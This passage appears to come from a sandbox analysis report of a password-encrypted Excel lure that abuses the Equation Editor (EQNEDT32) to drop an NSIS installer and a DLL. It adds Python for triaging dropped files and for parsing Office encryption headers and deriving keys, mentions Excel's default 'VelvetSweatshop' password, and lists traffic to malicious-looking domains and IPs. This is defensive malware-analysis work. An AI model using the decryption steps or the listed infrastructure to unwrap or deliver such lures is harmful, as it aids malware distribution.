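    dropped_paths = {r.path.lower() for r in records}
    writer = ntpath.basename(rec.process).upper()
    if is_office_owner_file(rec):
        return "low", ["Office owner/lock file written beside the opened document"]
    if not is_pe(rec):
        return "info", ["not a PE file"]
    reasons = []
    if writer in OFFICE_HOSTS:
        reasons.append(f"PE written by {writer}, which never legitimately drops executables")
    if rec.process.lower() in dropped_paths:
        reasons.append("written by a file that was itself dropped earlier (second stage)")
    if any(d in rec.path.lower() for d in STAGING_DIRS):
        reasons.append("placed in a user-writable staging directory")
    if rec.entropy >= 7.0:
        reasons.append(f"entropy {rec.entropy:.2f}: packed or compressed payload")
    if "Nullsoft Installer" in rec.file_type:
        reasons.append("NSIS self-extractor: unpacks further files at run time")
    severity = "high" if (writer in OFFICE_HOSTS or rec.process.lower() in dropped_paths) else "medium"
    return severity, reasons


def triage_all(records) -> dict:
    return {r.path: triage(r, records) for r in records}


if __name__ == "__main__":
    for path, (severity, reasons) in triage_all(RECORDS).items():
        print(f"{severity:6} {path}")
        for reason in reasons:
            print(f"       - {reason}")
```

The chain the rules surface is the one the report's signatures describe: EQNEDT32.EXE writes an NSIS self-extractor to C:\Users\Public, and that executable in turn writes a DLL into the user's Temp directory. The lock file scores low regardless of the report's verdict because nothing about it (size, type, writer, name) matches a payload.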

Static File Info

General

File type: CDFV2 Encrypted
Entropy (8bit): 7.99670962439914
TrID:
• Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name: QTN3C2AF414EDF9_041873.xlsx
File size: 2421248
MD5: 1b862193e621b4d67be94a2ec44fbf50
SHA1: 0bab9195da974524c969404430f6a58b31303322
SHA256: 709ae19031f48115d89fb3aeae68476aac8b17a1e97700c6beff820b7c54b8aa
SHA512: ba8833f1b0865cfe8c86b4eaa38c2b714152483703df8be21b7ecbe889480a0498c6d875bbcb28ba24c2898b13aa439849dddbf95cb8dc5dcdca75e3e69ca540
SSDEEP: 49152:YlbvU6wGnyG31TrBVcx6+mpF14GIlyXPs5OzOy7i0llTl8Z4JeZWo:YZvpwGnyGlTrBVcxMpF1TIyPsEzON0lm
File Content Preview: ........................>...................%...........................................................................................~...............z.......|.......~...............z.......|.......~...............z......................................

File Icon

Icon Hash: e4e2aa8aa4b4bcb4

Static OLE Info

General

Document Type: OLE
Number of OLE Files: 1

OLE File "QTN3C2AF414EDF9_041873.xlsx"

Indicators

Has Summary Info: False
Application Name: unknown
Encrypted Document: True
Contains Word Document Stream: False
Contains Workbook/Book Stream: False
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
General
Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type: data
Stream Size: 64
Entropy: 2.73637206947
Base64 Encoded: False
Data ASCII: . . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw: 08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
General
Stream Path: \x6DataSpaces/DataSpaceMap
File Type: data
Stream Size: 112
Entropy: 2.7597816111
Base64 Encoded: False
Data ASCII: . . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw: 08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
General
Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type: data
Stream Size: 200
Entropy: 3.13335930328
Base64 Encoded: False
Data ASCII: X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
General
Stream Path: \x6DataSpaces/Version
File Type: data
Stream Size: 76
Entropy: 2.79079600998
Base64 Encoded: False
Data ASCII: < . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw: 3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 2398680
General
Stream Path: EncryptedPackage
File Type: data
Stream Size: 2398680
Entropy: 7.99993012299
Base64 Encoded: True
Data ASCII: . . $ . . . . . . 2 . . q ( . . . . 1 . f . x . ^ . . . . . . . . & . . . . . . . + . . . . . ) . . . 5 J . . . . . . . . . . 4 J . . . . c . ~ . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . . { + x . $ . . x . . . K . . . .
Data Raw: c8 99 24 00 00 00 00 00 8a 32 ec b2 71 28 0f 8d d9 d5 31 f1 66 00 78 fa 5e aa c9 c2 a1 c6 bc ea b4 26 09 be e7 d8 9b ba 9f 2b c6 f7 fb 14 f0 29 a0 93 1b 35 4a af 02 e9 cb e9 8e d5 0c 09 d5 34 4a 0a 17 1e a7 63 df 7e 14 ca 9d 4b ae 00 1d d5 7b 2b 78 91 24 af 96 78 14 ca 9d 4b ae 00 1d d5 7b 2b 78 91 24 af 96 78 14 ca 9d 4b ae 00 1d d5 7b 2b 78 91 24 af 96 78 14 ca 9d 4b ae 00 1d d5
                                                                                                                                                                                                        Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                                                        General
                                                                                                                                                                                                        Stream Path:EncryptionInfo
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Stream Size:224
                                                                                                                                                                                                        Entropy:4.51185762188
                                                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                                                        Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . h - K . . . > % . B ] . . , . 4 . . . | . . . . . X . . . . . . . . . @ . . . $ . " * . f . . l . . . / . . k . . . . P . . . . F .
                                                                                                                                                                                                        Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00
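The three streams above (the DataSpaces marker, a 2.4 MB EncryptedPackage with entropy just under 8, and a 224-byte EncryptionInfo) are the layout of an OOXML file wrapped in Office "Standard Encryption" (MS-OFFCRYPTO 2.3.4.5), which is how a password-protected .xlsx looks on disk. The EncryptionInfo dump can be read directly: version 4.2, flags fCryptoAPI|fAES, a 140-byte header naming CALG_AES_128 (0x660E), CALG_SHA1 (0x8004), a 128-bit key and the "Microsoft Enhanced RSA and AES Cryptographic Provider" CSP, followed by a 72-byte EncryptionVerifier that the page truncates. The first eight bytes of EncryptedPackage (c8 99 24 00 00 00 00 00) are the little-endian plaintext length, 0x2499c8 = 2398664, and the remaining 2398672 bytes are that figure rounded up to the AES block size. The parser below is an added example, not part of this report or of the sandbox's tooling; its sample bytes are reconstructed from the dump above (the CSP name completed from the ASCII column), and the key-derivation routine implements the MS-OFFCRYPTO 2.3.4.7 password-to-key schedule so a candidate password can be tested once the verifier bytes are available.

```python
import hashlib
import struct

# Constructed sample: the first 152 bytes of this document's EncryptionInfo stream, rebuilt
# from the raw dump on the page. The dump stops inside the CSP name, which is completed from
# the ASCII column; the 72-byte EncryptionVerifier that follows is not reproduced on the page.
ENCRYPTION_INFO_HEAD = bytes.fromhex(
    "04000200"             # EncryptionVersionInfo: vMajor=4, vMinor=2 (Standard Encryption)
    "24000000"             # EncryptionInfo.Flags: fCryptoAPI | fAES
    "8c000000"             # EncryptionHeaderSize = 140
    "24000000" "00000000"  # EncryptionHeader.Flags, SizeExtra
    "0e660000" "04800000"  # AlgID = CALG_AES_128, AlgIDHash = CALG_SHA1
    "80000000" "18000000"  # KeySize = 128 bits, ProviderType = PROV_RSA_AES
    "00000000" "00000000"  # Reserved1, Reserved2
) + "Microsoft Enhanced RSA and AES Cryptographic Provider\0".encode("utf-16-le")

# Constructed sample: the first 8 bytes of the EncryptedPackage stream as dumped on the page.
ENCRYPTED_PACKAGE_HEAD = bytes.fromhex("c899240000000000")

CALG = {0x6801: "RC4", 0x660E: "AES-128", 0x660F: "AES-192", 0x6610: "AES-256"}
CALG_HASH = {0x8004: "SHA-1"}
PROV_TYPE = {0x01: "PROV_RSA_FULL", 0x18: "PROV_RSA_AES"}
FLAG_BITS = ((0x04, "fCryptoAPI"), (0x08, "fDocProps"), (0x10, "fExternal"), (0x20, "fAES"))


def decode_flags(value):
    return [name for bit, name in FLAG_BITS if value & bit]


def encrypted_package_plaintext_len(head):
    """EncryptedPackage starts with the unencrypted plaintext size as a little-endian u64."""
    return struct.unpack_from("<Q", head, 0)[0]


def parse_encryption_info(data):
    """Parse an OOXML EncryptionInfo stream into its header fields (Standard or Agile)."""
    if len(data) < 12:
        raise ValueError("EncryptionInfo too short")
    major, minor = struct.unpack_from("<HH", data, 0)
    if (major, minor) == (4, 4):
        # Agile encryption: 4 reserved bytes, then an XML descriptor. Not this sample.
        return {"scheme": "agile", "descriptor_xml": data[8:].decode("utf-8", "replace")}
    if minor != 2 or major not in (2, 3, 4):
        raise ValueError(f"unsupported EncryptionInfo version {major}.{minor}")
    flags, header_size = struct.unpack_from("<II", data, 4)
    header = data[12:12 + header_size]
    if len(header) < 32:
        raise ValueError("truncated EncryptionHeader")
    (_hflags, _size_extra, alg_id, alg_id_hash, key_size,
     prov_type, _reserved1, _reserved2) = struct.unpack_from("<8I", header, 0)
    csp_name = header[32:].decode("utf-16-le", "replace").split("\0", 1)[0]
    info = {
        "scheme": "standard",
        "version": f"{major}.{minor}",
        "flags": decode_flags(flags),
        "cipher": CALG.get(alg_id, f"unknown(0x{alg_id:04x})"),
        "hash": CALG_HASH.get(alg_id_hash, f"unknown(0x{alg_id_hash:04x})"),
        "key_bits": key_size,
        "provider_type": PROV_TYPE.get(prov_type, f"unknown(0x{prov_type:02x})"),
        "csp_name": csp_name,
        "verifier": None,
    }
    # EncryptionVerifier: SaltSize, Salt, EncryptedVerifier (16), VerifierHashSize,
    # EncryptedVerifierHash (32 bytes when fAES is set, 20 for RC4).
    tail = data[12 + header_size:]
    if len(tail) >= 4:
        salt_size = struct.unpack_from("<I", tail, 0)[0]
        hash_len = 32 if flags & 0x20 else 20
        if len(tail) < 4 + salt_size + 16 + 4 + hash_len:
            raise ValueError("truncated EncryptionVerifier")
        pos = 4
        salt = tail[pos:pos + salt_size]
        pos += salt_size
        enc_verifier = tail[pos:pos + 16]
        pos += 16
        vh_size = struct.unpack_from("<I", tail, pos)[0]
        pos += 4
        info["verifier"] = {"salt": salt, "encrypted_verifier": enc_verifier,
                            "verifier_hash_size": vh_size,
                            "encrypted_verifier_hash": tail[pos:pos + hash_len]}
    return info


def derive_standard_key(password, salt, key_bits, iterations=50000):
    """MS-OFFCRYPTO 2.3.4.7: password plus verifier salt -> AES key (SHA-1 variant)."""
    h = hashlib.sha1(salt + password.encode("utf-16-le")).digest()
    for i in range(iterations):                       # spec fixes 50000 rounds
        h = hashlib.sha1(struct.pack("<I", i) + h).digest()
    h_final = hashlib.sha1(h + b"\x00\x00\x00\x00").digest()
    x1 = hashlib.sha1(bytes(0x36 ^ b for b in h_final.ljust(64, b"\x00"))).digest()
    x2 = hashlib.sha1(bytes(0x5C ^ b for b in h_final.ljust(64, b"\x00"))).digest()
    return (x1 + x2)[: key_bits // 8]


if __name__ == "__main__":
    print(parse_encryption_info(ENCRYPTION_INFO_HEAD))
    print(encrypted_package_plaintext_len(ENCRYPTED_PACKAGE_HEAD))
```

To actually open such a sample you need the verifier bytes the page omits: derive the key from the candidate password (Excel's built-in default "VelvetSweatshop" is the first one to try for a workbook that opens without a prompt), AES-ECB-decrypt EncryptedVerifier and EncryptedVerifierHash, and compare SHA-1 of the former with the first VerifierHashSize bytes of the latter. AES is not in the Python standard library, so that last step needs a library such as pycryptodome and is left out here.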

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Src Port  Dst Port  Source IP        Dest IP
Feb 23, 2021 10:26:02.425698042 CET  49167  80  192.168.2.22  54.67.57.56
Feb 23, 2021 10:26:02.626029015 CET  80  49167  54.67.57.56  192.168.2.22
Feb 23, 2021 10:26:02.626152992 CET  49167  80  192.168.2.22  54.67.57.56
Feb 23, 2021 10:26:02.626580000 CET  49167  80  192.168.2.22  54.67.57.56
Feb 23, 2021 10:26:02.840116024 CET  80  49167  54.67.57.56  192.168.2.22
Feb 23, 2021 10:26:02.840220928 CET  49167  80  192.168.2.22  54.67.57.56
Feb 23, 2021 10:26:02.840297937 CET  49167  80  192.168.2.22  54.67.57.56
Feb 23, 2021 10:26:02.944238901 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.041582108 CET  80  49167  54.67.57.56  192.168.2.22
Feb 23, 2021 10:26:03.166332960 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.166465998 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.166852951 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.389307976 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.389350891 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.389374971 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.389398098 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.389426947 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.389426947 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.389431000 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.389470100 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.611238003 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.611298084 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.611337900 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.611371994 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.611407042 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.611428976 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.611449957 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.611459017 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.611479044 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.611486912 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.611500978 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.611520052 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.611522913 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.611563921 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.833647966 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833687067 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833712101 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833735943 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833759069 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833782911 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833808899 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833825111 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.833832026 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833853960 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833858013 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.833874941 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833893061 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833911896 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833930016 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833947897 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833970070 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833992958 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:03.833997965 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.834016085 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.834041119 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:03.837861061 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.056813002 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.056850910 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.056917906 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057039022 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057063103 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057084084 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057085991 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057111979 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057133913 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057145119 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057148933 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057157040 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057158947 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057182074 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057190895 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057195902 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057208061 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057233095 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057250977 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057255983 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057256937 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057271004 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057282925 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057292938 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057308912 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057324886 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057332039 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057353020 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057358980 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057374954 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057394028 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057399988 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057411909 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057435989 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057462931 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057481050 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057501078 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057518959 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057542086 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057552099 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057569027 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057573080 CET  49168  80  192.168.2.22  103.140.251.164
Feb 23, 2021 10:26:04.057593107 CET  80  49168  103.140.251.164  192.168.2.22
Feb 23, 2021 10:26:04.057609081 CET  49168  80  192.168.2.22  103.140.251.164

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 23, 2021 10:26:02.297571898 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Feb 23, 2021 10:26:02.357059002 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Feb 23, 2021 10:26:02.357660055 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Feb 23, 2021 10:26:02.414719105 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Feb 23, 2021 10:26:02.863348007 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Feb 23, 2021 10:26:02.942740917 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Feb 23, 2021 10:27:09.647248030 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Feb 23, 2021 10:27:09.710748911 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Feb 23, 2021 10:27:14.720684052 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Feb 23, 2021 10:27:14.798178911 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Feb 23, 2021 10:27:20.293311119 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Feb 23, 2021 10:27:20.533358097 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Feb 23, 2021 10:27:26.285974979 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Feb 23, 2021 10:27:26.359603882 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Feb 23, 2021 10:27:31.759540081 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Feb 23, 2021 10:27:31.838535070 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2021 10:26:02.297571898 CET | 192.168.2.22 | 8.8.8.8 | 0xd44b | Standard query (0) | ow.ly | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.357660055 CET | 192.168.2.22 | 8.8.8.8 | 0xd44b | Standard query (0) | ow.ly | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.863348007 CET | 192.168.2.22 | 8.8.8.8 | 0x7c8 | Standard query (0) | algreenstdykeghestqw.dns.army | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:09.647248030 CET | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.evoslancete.com | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:14.720684052 CET | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.fashionwatchesstore.com | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:20.293311119 CET | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.athara-kiano.com | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:26.285974979 CET | 192.168.2.22 | 8.8.8.8 | 0x6ec7 | Standard query (0) | www.overseaexpert.com | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:31.759540081 CET | 192.168.2.22 | 8.8.8.8 | 0xf09a | Standard query (0) | www.oryanomer.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2021 10:26:02.357059002 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.67.57.56 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.357059002 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.183.132.164 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.357059002 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.67.120.65 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.357059002 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.183.131.91 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.357059002 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.67.62.204 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.414719105 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.67.57.56 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.414719105 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.183.131.91 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.414719105 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.183.132.164 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.414719105 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.67.120.65 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.414719105 CET | 8.8.8.8 | 192.168.2.22 | 0xd44b | No error (0) | ow.ly | | 54.67.62.204 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:26:02.942740917 CET | 8.8.8.8 | 192.168.2.22 | 0x7c8 | No error (0) | algreenstdykeghestqw.dns.army | | 103.140.251.164 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:09.710748911 CET | 8.8.8.8 | 192.168.2.22 | 0x2e78 | Name error (3) | www.evoslancete.com | none | none | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:14.798178911 CET | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | www.fashionwatchesstore.com | | 104.21.61.250 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:14.798178911 CET | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | www.fashionwatchesstore.com | | 172.67.217.64 | A (IP address) | IN (0x0001)
Feb 23, 2021 10:27:20.533358097 CET | 8.8.8.8 | 192.168.2.22 | 0x3c4e | No error (0) | www.athara-kiano.com | athara-kiano.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 10:27:20.533358097 CET | 8.8.8.8 | 192.168.2.22 | 0x3c4e | No error (0) | athara-kiano.com | | 103.251.44.218 | A (IP address) | IN (0x0001)
